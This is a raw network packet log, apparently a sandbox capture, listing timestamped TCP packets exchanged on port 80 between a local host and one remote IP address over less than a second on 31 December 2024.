                                                        Dec 31, 2024 09:28:24.897770882 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.897783995 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.897842884 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.897870064 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.897887945 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.897900105 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.897933006 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.897952080 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.898029089 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.898545980 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.898557901 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.898569107 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.898588896 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.898603916 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.974025965 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.974078894 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.974092007 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.974148989 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.974186897 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.974201918 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.974212885 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.974212885 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.974256992 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.974670887 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.974682093 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.974699974 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.974709988 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.974720955 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.974769115 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.975094080 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.975115061 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.975126028 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.975147963 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.975241899 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.975254059 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.975286961 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.975972891 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.975995064 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.976006031 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.976022959 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.976037025 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.976113081 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.976125956 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.976171017 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.976819992 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.976871967 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.976883888 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.976911068 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.976973057 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.977010965 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.979309082 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.979366064 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.979377031 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.979407072 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.979487896 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.979523897 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.979542017 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.979553938 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.979587078 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.979610920 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.980106115 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.980119944 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.980145931 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.025079966 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.056140900 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.056154013 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.056165934 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.056205034 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.056226015 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.056237936 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.056251049 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.056262016 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.056272030 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.056322098 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.056448936 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.056463003 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.056473970 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.056484938 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.056497097 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.056508064 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.056526899 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.056540966 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.056680918 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.056737900 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.056750059 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.056761026 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.056777000 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.056798935 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.056921005 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.056932926 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.056942940 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.056952953 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.056965113 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.056972980 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.056981087 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.057004929 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.057022095 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.057260990 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.057271957 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.057308912 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.061444044 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.061465979 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.061476946 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.061506033 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.061577082 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.061589003 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.061614037 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.061625957 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.061664104 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.061697006 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.061736107 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.061748028 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.061775923 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.061847925 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.061861038 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.061892033 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.061917067 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.061928988 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.061939001 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.061964989 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.061981916 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.062241077 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.062293053 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.062303066 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.062336922 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.103252888 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.138179064 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.138206005 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.138219118 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.138309002 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.138334990 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.138346910 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.138359070 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.138389111 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.138401985 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.138421059 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.138462067 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.138503075 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.138525963 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.138537884 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.138547897 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.138581991 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.138685942 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.138734102 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.138757944 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.138778925 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.138791084 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.138824940 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.138859987 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.138895988 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.138930082 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.138940096 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.138979912 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.139136076 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.139189005 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.139202118 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.139235973 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.139311075 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.139331102 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.139347076 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.139360905 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.139367104 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.139391899 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.139542103 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.139554024 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.139565945 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.139575958 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.139588118 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.139595032 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.139612913 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.139637947 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.140017033 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.140044928 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.140055895 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.140093088 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.140192032 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.140202999 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.140213966 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.140224934 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.140233040 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.140249968 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.140356064 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.140367985 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.140400887 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.143477917 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.143528938 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.143537998 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.143548965 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.143591881 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.143615961 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.143627882 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.143639088 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.143663883 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.143743992 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.143755913 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.143771887 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.143784046 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.143819094 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.143831015 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.143851042 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.143887997 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.143904924 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.143915892 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.143927097 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.143955946 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.143990993 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.144035101 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.221482038 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.221522093 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.221534014 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.221545935 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.221609116 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.221661091 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.221682072 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.221694946 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.221707106 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.221718073 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.221733093 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.221740961 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.221750975 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.221762896 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.221771955 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.221812010 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.221976995 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.221988916 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222001076 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222012043 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222021103 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.222031116 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222043037 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222048998 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.222079992 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.222203970 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222214937 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222227097 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222238064 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222244978 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.222254992 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222268105 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.222300053 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.222332954 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222343922 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222378969 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.222496033 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222507000 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222517967 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222528934 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222538948 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222546101 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.222559929 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.222568989 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222580910 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222593069 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222604990 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.222625017 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.222821951 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222832918 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222842932 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222853899 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222897053 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222903013 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.222903013 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.222914934 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222925901 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222935915 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222948074 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222956896 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.222965956 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222980022 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.222987890 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.222997904 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.223006010 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.223041058 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.223433971 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.223450899 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.223462105 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.223474026 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.223510981 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.223526955 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.223582983 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.223593950 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.223603964 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.223614931 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.223630905 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.223639965 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.223655939 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.223660946 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.223670959 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.223680973 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.223694086 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.223712921 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.223712921 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.223917007 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.223968029 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.223988056 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.223999023 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.224009037 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.224020958 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.224039078 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.224069118 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.226547003 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.226597071 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.226609945 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.226649046 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.226659060 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.226711035 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.234860897 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.302282095 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302304029 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302318096 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302355051 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.302372932 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302386045 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302412987 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.302459955 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302470922 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302481890 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302494049 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.302575111 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302586079 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302594900 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.302604914 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302635908 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.302664042 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302675962 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302700996 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.302716970 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302755117 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.302782059 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302793026 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302803993 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302819967 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.302824974 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302874088 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.302912951 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302963018 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302974939 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302984953 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.302999973 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.303019047 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.303112984 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303123951 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303134918 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303145885 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303159952 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.303164959 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:25.303180933 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:25.303189039 CET804970887.120.113.91192.168.2.8
